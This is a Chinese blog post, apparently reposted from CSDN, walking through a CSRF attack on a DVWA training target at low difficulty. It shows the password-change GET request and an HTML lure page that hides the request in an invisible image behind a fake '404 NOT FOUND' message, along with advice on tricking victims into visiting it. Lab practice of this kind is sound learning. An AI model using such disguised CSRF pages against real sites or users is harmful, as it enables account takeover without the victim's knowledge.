其他分享
首页 > 其他分享> > 从零开始的DVWA靶机攻击经历(第一天)

从零开始的DVWA靶机攻击经历(第一天)

作者:互联网

从零开始的DVWA靶机攻击经历(第二天)

csrf(low难度)

csrf是利用服务端对用户端浏览器已登录后操作免校验而构建的攻击方式。
原理:攻击者构建一个链接让受害者访问已登陆的网站并进行操作但受害者不知道。

  1. 登陆DVWA,调整难度为low,切换到csrf
  2. 其中有一个校验密码的框和修改密码的框
  3. 尝试修改密码后发现,url变成了http://192.168.142.132/DVWA/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#(192.168.142.132是专门搭建的靶机)
  4. 可以发现是get方式的,所以可以构建一个新的请求来完成改密码的操作而且让受害者不知道
  5. 构建攻击页面
    构建的请求:http://192.168.142.132/DVWA/vulnerabilities/csrf/?password_new=password1&password_conf=password1&Change=Change#
    专门构建一个html页面让受害者访问
<html>
<img src="http://192.168.142.132/DVWA/vulnerabilities/csrf/?password_new=password1&password_conf=password1&Change=Change#" border="0" style="display:none;"/>
<h1>404 NOT FOUND</h1>
<h2>Files cannot be found.</h2> 
</html>

想办法让受害者访问你构建的页面
这个构建的页面中有一个无法显示的图片,这个图片就是用来发起请求的
其实只要让受害者访问你构建的请求就可以了,但是这样很容易被发现,建议通过构建网页的方式

  1. 这个是针对get请求的csrf攻击,针对post请求的csrf攻击大同小异,加一个form就可以了

标签:受害者,DVWA,从零开始,构建,csrf,靶机,password,Change
来源: https://blog.csdn.net/qq1481011684/article/details/117023639